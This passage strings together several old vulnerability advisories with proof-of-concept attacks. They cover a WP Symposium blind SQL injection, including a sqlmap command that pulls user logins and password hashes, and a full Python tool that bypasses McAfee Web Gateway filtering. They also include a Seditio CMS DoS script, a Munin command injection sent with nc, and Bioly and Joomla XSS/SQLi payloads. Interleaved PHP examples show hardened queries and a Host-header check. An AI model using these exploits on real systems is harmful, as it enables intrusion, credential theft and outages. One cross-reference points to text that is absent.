impact: CVSS Base Score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
homepage: https://wordpress.org/plugins/wp-symposium/
found: 2015-02-07
by: Hannes Trunde
mail: hannes.trunde@gmail.com
twitter: @hannestrunde
=======================================================================
Plugin description:
-------------------
"WP Symposium turns a WordPress website into a Social Network! It is a WordPress
plugin that provides a forum, activity (similar to Facebook wall), member
directory, private mail, notification panel, chat windows, profile page, social
widgets, activity alerts, RSS activity feeds, Groups, Events, Gallery, Facebook
Connect and Mobile support! You simply choose which you want to activate!
Certain features are optional to members to protect their privacy."
Source: https://wordpress.org/plugins/wp-symposium/
Recommendation:
---------------
The author has provided a fixed plugin version which should be installed
immediately.
Vulnerability overview/description:
-----------------------------------
Because of insufficient input validation, a blind sql injection attack can be
performed within the forum feature to obtain sensitive information from the
database. The vulnerable code sections are described below.
forum.php lines 59-62:
===============================================================================
if ( ( $topic_id == '' && $cat_id == '') || ( !$cat_id != '' && get_option(WPS_OPTIONS_PREFIX.'_forum_ajax') && !get_option(WPS_OPTIONS_PREFIX.'_permalink_structure') ) ) {
$cat_id = isset($_GET['cid']) ? $_GET['cid'] : 0;
$topic_id = isset($_GET['show']) ? $_GET['show'] : 0; // GET PARAMETER IS ASSIGNED TO $topic_id VARIABLE
}
===============================================================================
forum.php lines 95-103:
===============================================================================
if ( get_option(WPS_OPTIONS_PREFIX.'_permalink_structure') || !get_option(WPS_OPTIONS_PREFIX.'_forum_ajax') ) {
if ($topic_id == 0) {
$forum = __wps__getForum($cat_id);
if (($x = strpos($forum, '[|]')) !== FALSE) $forum = substr($forum, $x+3);
$html .= $forum;
} else {
$html .= __wps__getTopic($topic_id); // __wps__getTopic IS CALLED WITH $topic_id AS PARAMETER
}
}
===============================================================================
functions.php lines 152-155:
===============================================================================
$post = $wpdb->get_row("
SELECT tid, topic_subject, topic_approved, topic_category, topic_post, topic_started, display_name, topic_sticky, topic_owner, for_info
FROM ".$wpdb->prefix."symposium_topics t INNER JOIN ".$wpdb->base_prefix."users u ON t.topic_owner = u.ID
WHERE (t.topic_approved = 'on' OR t.topic_owner = ".$current_user->ID.") AND tid = ".$topic_id); //UNVALIDATED $topic_id IS USED IN SQL QUERY
===============================================================================
Proof of concept:
-----------------
The following HTTP request to the forum page returns the topic with id 1:
===============================================================================
http://www.site.com/?page_id=4&cid=1&show=1 AND 1=1
===============================================================================
The following HTTP request to the forum page returns a blank page, thus
confirming the blind SQL injection vulnerability:
===============================================================================
http://www.site.com/?page_id=4&cid=1&show=1 AND 1=0
===============================================================================
Obtaining users and password hashes with sqlmap may look as follows:
================================================================================
sqlmap -u "http://www.site.com/?page_id=4&cid=1&show=1" -p "show" --technique=B --dbms=mysql --sql-query="select user_login,user_pass from wp_users"
================================================================================
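This bug and the FeedWordPress `implode(",", $_POST['link_ids'])` query earlier on this page fail the same way: a value that must be an integer is concatenated into SQL as a string, and `sqlmap`'s `1) UNION ALL SELECT ...` and `1 AND 1=0` payloads ride along. The PHP below is an added example, not code from either plugin. It builds both vulnerable query shapes next to hardened versions that validate each id and bind it through an integer placeholder. The table names, the digits-only validation regex and the `sprintf`/`vsprintf` `%d` placeholders standing in for `$wpdb->prepare()` are assumptions; the script runs with plain `php`, touches no database and only prints the SQL it would send.

```php
<?php
// Added example: not code from FeedWordPress or WP Symposium. Assumed: table
// names, the integer-only regex, and %d placeholders as a stand-in for
// $wpdb->prepare(). Runs offline; it only assembles SQL strings.

declare(strict_types=1);

// Vulnerable, FeedWordPress style: attacker-controlled array joined into IN().
function vulnerable_in_clause(array $link_ids): string
{
    return "SELECT * FROM wp_links WHERE link_id IN (" . implode(",", $link_ids) . ")";
}

// Vulnerable, WP Symposium style: scalar id concatenated into WHERE.
function vulnerable_topic_query(int $current_user_id, string $topic_id): string
{
    return "SELECT tid, topic_subject FROM wp_symposium_topics t"
        . " WHERE (t.topic_approved = 'on' OR t.topic_owner = {$current_user_id})"
        . " AND tid = " . $topic_id;
}

// Accepts only a short run of decimal digits, so "1) UNION ..." and
// "1 AND 1=0" are rejected before any SQL is assembled. (WordPress's absint()
// would silently turn them into 1 instead; rejecting is the louder choice.)
function require_int_id($raw): int
{
    if (!is_int($raw) && !is_string($raw)) {
        throw new InvalidArgumentException('id must be a scalar');
    }
    if (!preg_match('/^\d{1,10}\z/', (string) $raw)) {
        throw new InvalidArgumentException('id is not a non-negative integer: ' . (string) $raw);
    }
    return (int) $raw;
}

// Hardened IN(): one %d per validated id, count decided by the server. The
// WordPress equivalent is
//   $wpdb->prepare("... IN (" . implode(',', array_fill(0, count($ids), '%d')) . ")", $ids)
function safe_in_clause(array $link_ids): string
{
    if ($link_ids === []) {
        throw new InvalidArgumentException('empty id list');
    }
    $ids = array_map('require_int_id', $link_ids);
    $placeholders = implode(',', array_fill(0, count($ids), '%d'));
    return vsprintf("SELECT * FROM wp_links WHERE link_id IN ({$placeholders})", $ids);
}

// Hardened scalar id: validated, then emitted through %d.
function safe_topic_query(int $current_user_id, string $topic_id): string
{
    return sprintf(
        "SELECT tid, topic_subject FROM wp_symposium_topics t"
        . " WHERE (t.topic_approved = 'on' OR t.topic_owner = %d) AND tid = %d",
        $current_user_id,
        require_int_id($topic_id)
    );
}

// Constructed inputs shaped like the payloads on this page.
$union = ['1) UNION ALL SELECT NULL,NULL,user_pass FROM wp_users--'];
$blind = '1 AND 1=0';

echo vulnerable_in_clause($union), PHP_EOL;      // the UNION survives implode()
echo vulnerable_topic_query(7, $blind), PHP_EOL; // the boolean tail survives concatenation

foreach (['safe_in_clause' => [$union], 'safe_topic_query' => [7, $blind]] as $fn => $args) {
    try {
        echo $fn(...$args), PHP_EOL;
    } catch (InvalidArgumentException $e) {
        echo $fn, ' rejected input: ', $e->getMessage(), PHP_EOL;
    }
}

// Well-formed ids go through and come out as bare integers.
echo safe_in_clause(['1', '2', '3']), PHP_EOL;
echo safe_topic_query(7, '1'), PHP_EOL;
```

In a real plugin the two hardened builders collapse to `$wpdb->prepare()` calls with `%d` placeholders; what matters is that the placeholder count and the integer cast are decided by the server, so neither payload ever reaches MySQL as SQL.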
Contact timeline:
------------------------
2015-04-08: Contacting author via mail.
2015-04-13: Mail from author, confirming the vulnerability.
2015-04-14: Requesting CVE via post to the open source software security mailing
list: http://openwall.com/lists/oss-security/2015/04/14/5
2015-04-15: Mail from author, stating that updated plugin version will be
available in the next few days.
2015-05-05: Mail from author, stating that fixed version has been uploaded and
should be available soon.
2015-05-07: Confirming that update is available, releasing security advisory
Solution:
---------
Update to the most recent plugin version.
Workaround:
-----------
See solution.
source: https://www.securityfocus.com/bid/53015/info
McAfee Web Gateway is prone to a security-bypass vulnerability because it fails to properly enforce filtering rules.
A successful attack will allow an attacker to bypass intended security restrictions; this may aid in other attacks.
McAfee Web Gateway 7 is vulnerable; other versions may also be affected.
import socket,struct,sys,time
from threading import Thread
#The timeOut can be changed if the proxy is slow.
#Tested in GMail, Facebook, Youtube and several blocked sites.
#The proxy reads the Host field of the HTTP header and does not verify anything else.
#It trusts the HTTP header, which the attacker can set freely.
timeOut = 0.8
isGet = 0
hostNameG = ""
pacoteGet = ""
port = 8080 #Listening port
proxyAddr = "vulnerableProxy.com" #vulnerable proxy
proxyPort = 8080 # proxy port
def handle(client,globalSock):
    client.settimeout(timeOut)
    global hostNameG
    while 1:
        #read everything the browser sends until it goes quiet
        dados = ""
        tam = 0
        while 1:
            try:
                dados2 = client.recv(1024)
                tam = tam + len(dados2)
                dados = dados + dados2
            except socket.timeout:
                break
        dd = dados.find("CONNECT") #if the packet is a CONNECT METHOD
        if dd != -1:
            dd2 = dados.find(":")
            hostName = dados[dd+8:dd2]
            ipAddr = socket.gethostbyname(hostName) #changing the method to connect to the ip address, not the dns domain
            pacote = dados
            hostHeader = "Host: " + hostName
            pacote = pacote.replace(hostHeader, "Host: www.uol.com.br") #changing the host field with a value that is accepted by the proxy
            pacote = pacote.replace(hostName, ipAddr) #changing domain for ip
            dados = pacote
        getd = dados.find("GET ")
        getd2 = dados.find("//")
        getd3 = dados.find("/", getd2+2)
        hostName = dados[getd2+2:getd3]
        if getd != -1: #plain GET: first open a tunnel through the proxy, then send the request inside it
            globalSock.close()
            globalSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            globalSock.connect((proxyAddr,proxyPort))
            globalSock.settimeout(timeOut)
            getd2 = dados.find("//")
            getd3 = dados.find("/", getd2+2)
            hostName = dados[getd2+2:getd3]
            proxyAuth = ""
            proxyAuthN = dados.find("Proxy-Authorization:") #keep the browser's proxy credentials, if any
            if proxyAuthN != -1:
                proxyAuthNN = dados.find("\r\n", proxyAuthN)
                proxyAuth = dados[proxyAuthN:proxyAuthNN]
            ipAddr = socket.gethostbyname(hostName)
            info = "CONNECT " + ipAddr + ":80 HTTP/1.1\r\n"
            if proxyAuthN != -1:
                info += proxyAuth + "\r\n"
            info += "Host: www.uol.com.br\r\n\r\n"
            globalSock.send(info)
            tam = 0
            gdata = ""
            while 1: #swallow the proxy's reply to the CONNECT
                try:
                    gdata2 = globalSock.recv(1024)
                    tam = tam + len(gdata2)
                    gdata = gdata + gdata2
                    if len(gdata2) == 0:
                        break
                except socket.timeout:
                    break
        globalSock.send(dados) #forward the (rewritten) request and relay the answer back to the browser
        tam = 0
        gdata = ""
        while 1:
            try:
                gdata2 = globalSock.recv(1024)
                if len(gdata2) > 0:
                    client.send(gdata2)
                tam = tam + len(gdata2)
                gdata = gdata + gdata2
                if len(gdata2) == 0:
                    break
            except socket.timeout:
                break
print 'Proxy Bypass'
print 'by Gabriel Menezes Nunes'
print 'Tested on McAfee Web Gateway 7 and Squid Proxy'
sockzao = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print 'Attacked Proxy:',
print proxyAddr
print 'Listening on',
print port
sockzao.bind(("",port))
sockzao.listen(6)
while 1:
    print 'Waiting for connections'
    client, address = sockzao.accept()
    print 'Client Connected'
    print address
    globalSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    globalSock.connect((proxyAddr,proxyPort))
    globalSock.settimeout(timeOut)
    t = Thread(target=handle, args=(client,globalSock,))
    t.start()
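The PoC works because the proxy keys its filtering decision on the Host header, which the client writes, instead of on the request-target, which is where the connection actually goes. The PHP below is an added example, not part of the advisory or of the script above, written as plain string handling: it parses a CONNECT or absolute-form GET request, takes the destination from the request-target, and refuses the request when a Host header names something else. The three sample requests are constructed to mirror the shapes the PoC emits.

```php
<?php
// Added example, not from the advisory or its PoC: the consistency check the
// bypass shows missing. The destination a filter evaluates must come from the
// request-target (authority-form for CONNECT, absolute-form URL for GET); a
// Host header that disagrees is an error, not a hint. Sample requests below
// are constructed.

declare(strict_types=1);

/**
 * Returns the destination host the filter must evaluate, or null when the
 * request is malformed or its Host header disagrees with the request-target.
 */
function proxy_destination(string $raw): ?string
{
    $lines = preg_split("/\r?\n/", $raw);
    $requestLine = array_shift($lines) ?? '';
    if (!preg_match('~^(CONNECT|GET)\s+(\S+)\s+HTTP/1\.[01]$~', $requestLine, $m)) {
        return null;
    }
    [, $method, $target] = $m;

    if ($method === 'CONNECT') {
        // authority-form: host:port and nothing else
        if (!preg_match('~^([^:/\s]+):(\d{1,5})$~', $target, $t)) {
            return null;
        }
        $host = $t[1];
    } else {
        // absolute-form: scheme://host[:port]/path (origin-form carries no host)
        $parts = parse_url($target);
        if (!is_array($parts) || empty($parts['host'])) {
            return null;
        }
        $host = $parts['host'];
    }

    foreach ($lines as $line) {
        if ($line === '') {
            break;                                   // end of headers
        }
        if (stripos($line, 'Host:') === 0) {
            $hostHeader = preg_replace('/:\d+$/', '', trim(substr($line, 5)));
            // The PoC sends "CONNECT <ip>:80" with "Host: www.uol.com.br":
            // the header names a different place than the tunnel target.
            if (strcasecmp($hostHeader, $host) !== 0) {
                return null;
            }
        }
    }
    // For the policy lookup: when $host is a literal IP, the block list has
    // to be matched on resolved addresses as well as names, otherwise the
    // PoC's second trick (swapping the name for its IP) still gets through.
    return strtolower($host);
}

// Constructed requests mirroring the three shapes the PoC produces.
$honest  = "CONNECT blocked.example:443 HTTP/1.1\r\nHost: blocked.example:443\r\n\r\n";
$bypass  = "CONNECT 203.0.113.20:80 HTTP/1.1\r\nHost: www.uol.com.br\r\n\r\n";
$getForm = "GET http://blocked.example/index.html HTTP/1.1\r\nHost: www.uol.com.br\r\n\r\n";

foreach (['honest' => $honest, 'bypass' => $bypass, 'get-form' => $getForm] as $label => $req) {
    $dest = proxy_destination($req);
    printf("%-9s -> %s\n", $label, $dest ?? 'refused (Host header disagrees with request-target)');
}
```

Refusing on mismatch is deliberately strict: a legitimate client has no reason to send a Host header that differs from the tunnel endpoint, so the mismatch itself is a reliable signal of tampering and worth logging as such.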
source: https://www.securityfocus.com/bid/53018/info
Bioly is prone to multiple SQL-injection and cross-site scripting vulnerabilities.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Bioly 1.3 is vulnerable; other versions may also be affected.
Cross Site Scripting
POST /index.php?action=3 HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: STORED XSS TEST
Host: localhost
Content-Length: 68
Connection: Close
Pragma: no-cache
# [Post Data:]==>
email=>"><ScRiPt%20%0a%0d>alert(421135893768)%3B</ScRiPt>&register=1
SQL Injection
POST /index.php?action=11 HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Sql Injection
Host: localhost
Content-Length: 68
Connection: Close
Pragma: no-cache
# [Post Data:]==>
q=%00'
source: https://www.securityfocus.com/bid/53036/info
Seditio CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Seditio CMS 165 is vulnerable; prior versions may also be affected.
$exploit=$targetsite & "/plug.php?e=akastep',rd_location=(benchmark(unix_timestamp(now()),sha1(md5(now())))),rd_ip='" & @IPAddress1 & "',rd_lastseen='" ; Our exploit: the injected benchmark() keeps the DBMS busy.
$first=$targetsite & '/forums.php' ; Our first request goes here.
HttpSetUserAgent("I'm Denial Of Service Exploit for Seditio 165 throught sql injection") ; setting the user agent, just for fun
InetGet($first,'',1) ; First request. After this our IP address is inserted into the table sed_redirecter, which is necessary for the exploit to work.
Sleep(1500) ; sleep 1.5 seconds (waiting operation)
HttpSetUserAgent("Exploiting!!!!") ; setting our user agent again, just for fun
InetGet($exploit,'',1,1) ; Now exploit it with the "do not wait for response" option. This triggers the SQL injection and causes the denial of service.
Exit ; exit from exploit
source: https://www.securityfocus.com/bid/53032/info
Munin is prone to a remote command-injection vulnerability.
Attackers can exploit this issue to inject and execute arbitrary commands in the context of the application.
printf 'GET /cgi-bin/munin-cgi-graph/%%0afoo%%0a/x/x-x.png HTTP/1.0\r\nHost: localhost\r\nConnection: close\r\n\r\n' | nc localhost 80
source: https://www.securityfocus.com/bid/53030/info
Joomla! Beatz Plugin is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker could leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This could allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/beatz/?option=com_content&view=frontpage&limitstart=5&%2522%253e%253c%2573%2563%2572%2569%2570%2574%253e%2561%256c%2565%2572%2574%2528%2f%2558%2553%2553%2f%2529%253c%2f%2573%2563%2572%2569%2570%2574%253e=1
http://www.example.com/beatz/index.php?option=com_charts&view=charts&Itemid=76&chartkeyword=Acoustic&do=all%22%20style%3dbackground-image:url('javascript:alert(/XSS/)');width:1000px;height:1000px;display:block;"%20x=%22&option=com_charts
http://www.example.com/beatz/index.php?do=listAll&keyword=++Search";><img+src=0+onerror=prompt(/XSS/)>&option=com_find
http://www.example.com/beatz/index.php?option=com_videos&view=videos&Itemid=59&video_keyword="+style="width:1000px;height:1000px;position:absolute;left:0;top:0"+onmouseover="alert(/xss/)&search=Search